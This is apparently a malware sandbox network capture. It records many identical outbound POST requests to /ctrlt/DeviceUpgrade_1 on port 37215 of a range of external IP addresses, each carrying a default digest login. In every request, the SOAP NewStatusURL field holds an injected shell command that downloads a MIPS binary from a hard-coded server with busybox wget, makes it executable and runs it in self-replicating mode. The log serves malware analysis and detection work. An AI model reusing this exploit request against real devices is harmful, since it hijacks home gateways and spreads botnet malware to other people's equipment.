                                                        Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                        Content-Length: 491
                                                        Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 72 6d 20 2d 72 66 20 2f 74 6d 70 2f 6c 69 6e 75 78 78 78 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 33 2e 31 37 37 2e 33 35 2e 33 32 20 2d 6c 20 2f 74 6d 70 2f 6c 69 6e 75 78 78 78 20 2d 72 20 2f 74 61 6a 6d 61 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f [TRUNCATED]
                                                        Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(rm -rf /tmp/linuxxx; /bin/busybox wget -g 103.177.35.32 -l /tmp/linuxxx -r /tajma.mips; /bin/busybox chmod 777 /tmp/linuxxx; /tmp/linuxxx selfrep.tajma)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        2563192.168.2.2332840157.118.54.22337215
                                                        TimestampBytes transferredDirectionData
                                                        May 28, 2024 08:59:14.622227907 CEST860OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                        Connection: keep-alive
                                                        Accept: */*
                                                        Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                        Content-Length: 491
                                                        Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 72 6d 20 2d 72 66 20 2f 74 6d 70 2f 6c 69 6e 75 78 78 78 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 33 2e 31 37 37 2e 33 35 2e 33 32 20 2d 6c 20 2f 74 6d 70 2f 6c 69 6e 75 78 78 78 20 2d 72 20 2f 74 61 6a 6d 61 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f [TRUNCATED]
                                                        Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(rm -rf /tmp/linuxxx; /bin/busybox wget -g 103.177.35.32 -l /tmp/linuxxx -r /tajma.mips; /bin/busybox chmod 777 /tmp/linuxxx; /tmp/linuxxx selfrep.tajma)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        2564192.168.2.2360208197.232.235.8137215
                                                        TimestampBytes transferredDirectionData
                                                        May 28, 2024 08:59:14.622236967 CEST860OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                        Connection: keep-alive
                                                        Accept: */*
                                                        Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                        Content-Length: 491
                                                        Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 72 6d 20 2d 72 66 20 2f 74 6d 70 2f 6c 69 6e 75 78 78 78 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 33 2e 31 37 37 2e 33 35 2e 33 32 20 2d 6c 20 2f 74 6d 70 2f 6c 69 6e 75 78 78 78 20 2d 72 20 2f 74 61 6a 6d 61 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f [TRUNCATED]
                                                        Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(rm -rf /tmp/linuxxx; /bin/busybox wget -g 103.177.35.32 -l /tmp/linuxxx -r /tajma.mips; /bin/busybox chmod 777 /tmp/linuxxx; /tmp/linuxxx selfrep.tajma)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        2565192.168.2.2357604197.188.116.14037215
                                                        TimestampBytes transferredDirectionData
                                                        May 28, 2024 08:59:14.622241020 CEST860OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                        Connection: keep-alive
                                                        Accept: */*
                                                        Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                        Content-Length: 491
                                                        Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 72 6d 20 2d 72 66 20 2f 74 6d 70 2f 6c 69 6e 75 78 78 78 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 33 2e 31 37 37 2e 33 35 2e 33 32 20 2d 6c 20 2f 74 6d 70 2f 6c 69 6e 75 78 78 78 20 2d 72 20 2f 74 61 6a 6d 61 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f [TRUNCATED]
                                                        Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(rm -rf /tmp/linuxxx; /bin/busybox wget -g 103.177.35.32 -l /tmp/linuxxx -r /tajma.mips; /bin/busybox chmod 777 /tmp/linuxxx; /tmp/linuxxx selfrep.tajma)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        2566192.168.2.2348040197.182.223.10737215
                                                        TimestampBytes transferredDirectionData
                                                        May 28, 2024 08:59:14.622268915 CEST860OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                        Connection: keep-alive
                                                        Accept: */*
                                                        Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                        Content-Length: 491
                                                        Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 72 6d 20 2d 72 66 20 2f 74 6d 70 2f 6c 69 6e 75 78 78 78 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 33 2e 31 37 37 2e 33 35 2e 33 32 20 2d 6c 20 2f 74 6d 70 2f 6c 69 6e 75 78 78 78 20 2d 72 20 2f 74 61 6a 6d 61 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f [TRUNCATED]
                                                        Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(rm -rf /tmp/linuxxx; /bin/busybox wget -g 103.177.35.32 -l /tmp/linuxxx -r /tajma.mips; /bin/busybox chmod 777 /tmp/linuxxx; /tmp/linuxxx selfrep.tajma)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        2567192.168.2.2347276157.199.94.22137215
                                                        TimestampBytes transferredDirectionData
                                                        May 28, 2024 08:59:14.622268915 CEST860OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                        Connection: keep-alive
                                                        Accept: */*
                                                        Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                        Content-Length: 491
                                                        Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 72 6d 20 2d 72 66 20 2f 74 6d 70 2f 6c 69 6e 75 78 78 78 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 33 2e 31 37 37 2e 33 35 2e 33 32 20 2d 6c 20 2f 74 6d 70 2f 6c 69 6e 75 78 78 78 20 2d 72 20 2f 74 61 6a 6d 61 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f [TRUNCATED]
                                                        Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(rm -rf /tmp/linuxxx; /bin/busybox wget -g 103.177.35.32 -l /tmp/linuxxx -r /tajma.mips; /bin/busybox chmod 777 /tmp/linuxxx; /tmp/linuxxx selfrep.tajma)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        2568192.168.2.2348718163.101.216.21537215
                                                        TimestampBytes transferredDirectionData
                                                        May 28, 2024 08:59:14.622268915 CEST860OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                        Connection: keep-alive
                                                        Accept: */*
                                                        Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                        Content-Length: 491
                                                        Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 72 6d 20 2d 72 66 20 2f 74 6d 70 2f 6c 69 6e 75 78 78 78 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 33 2e 31 37 37 2e 33 35 2e 33 32 20 2d 6c 20 2f 74 6d 70 2f 6c 69 6e 75 78 78 78 20 2d 72 20 2f 74 61 6a 6d 61 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f [TRUNCATED]
                                                        Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(rm -rf /tmp/linuxxx; /bin/busybox wget -g 103.177.35.32 -l /tmp/linuxxx -r /tajma.mips; /bin/busybox chmod 777 /tmp/linuxxx; /tmp/linuxxx selfrep.tajma)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        2569192.168.2.2356656157.238.134.11037215
                                                        TimestampBytes transferredDirectionData
                                                        May 28, 2024 08:59:14.627721071 CEST860OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                        Connection: keep-alive
                                                        Accept: */*
                                                        Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                        Content-Length: 491
                                                        Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 72 6d 20 2d 72 66 20 2f 74 6d 70 2f 6c 69 6e 75 78 78 78 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 33 2e 31 37 37 2e 33 35 2e 33 32 20 2d 6c 20 2f 74 6d 70 2f 6c 69 6e 75 78 78 78 20 2d 72 20 2f 74 61 6a 6d 61 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f [TRUNCATED]
                                                        Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(rm -rf /tmp/linuxxx; /bin/busybox wget -g 103.177.35.32 -l /tmp/linuxxx -r /tajma.mips; /bin/busybox chmod 777 /tmp/linuxxx; /tmp/linuxxx selfrep.tajma)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        2570192.168.2.234575441.55.122.13237215
                                                        TimestampBytes transferredDirectionData
                                                        May 28, 2024 08:59:14.627724886 CEST860OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                        Connection: keep-alive
                                                        Accept: */*
                                                        Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                        Content-Length: 491
                                                        Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 72 6d 20 2d 72 66 20 2f 74 6d 70 2f 6c 69 6e 75 78 78 78 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 33 2e 31 37 37 2e 33 35 2e 33 32 20 2d 6c 20 2f 74 6d 70 2f 6c 69 6e 75 78 78 78 20 2d 72 20 2f 74 61 6a 6d 61 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f [TRUNCATED]
                                                        Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(rm -rf /tmp/linuxxx; /bin/busybox wget -g 103.177.35.32 -l /tmp/linuxxx -r /tajma.mips; /bin/busybox chmod 777 /tmp/linuxxx; /tmp/linuxxx selfrep.tajma)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        2571192.168.2.233690241.61.47.19137215
                                                        TimestampBytes transferredDirectionData
                                                        May 28, 2024 08:59:14.627726078 CEST860OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                        Connection: keep-alive
                                                        Accept: */*
                                                        Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                        Content-Length: 491
                                                        Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 72 6d 20 2d 72 66 20 2f 74 6d 70 2f 6c 69 6e 75 78 78 78 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 33 2e 31 37 37 2e 33 35 2e 33 32 20 2d 6c 20 2f 74 6d 70 2f 6c 69 6e 75 78 78 78 20 2d 72 20 2f 74 61 6a 6d 61 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f [TRUNCATED]
                                                        Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(rm -rf /tmp/linuxxx; /bin/busybox wget -g 103.177.35.32 -l /tmp/linuxxx -r /tajma.mips; /bin/busybox chmod 777 /tmp/linuxxx; /tmp/linuxxx selfrep.tajma)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        2572192.168.2.235265641.177.125.4637215
                                                        TimestampBytes transferredDirectionData
                                                        May 28, 2024 08:59:14.627790928 CEST860OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                        Connection: keep-alive
                                                        Accept: */*
                                                        Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                        Content-Length: 491
